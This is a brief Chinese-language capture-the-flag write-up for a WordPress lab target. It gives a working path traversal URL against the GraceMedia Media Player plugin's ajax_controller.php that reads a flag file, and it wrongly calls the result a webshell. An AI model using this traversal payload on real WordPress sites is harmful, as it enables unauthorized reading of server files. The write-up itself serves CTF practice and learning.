1.阅读靶场介绍没有任何思路但是以往的wordpress会出现这个玩法可以试试话不多说进入正题2.启动靶场如下图所示3.poc直接在路径拼接上https://eci-2ze8vcjw8w2qm243tmn5.cloudeci1.ichunqiu.com:80/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxActiongetIdscfg../../../../../../../../../../flag到此就可以完成webshell了感谢您宝贵的时间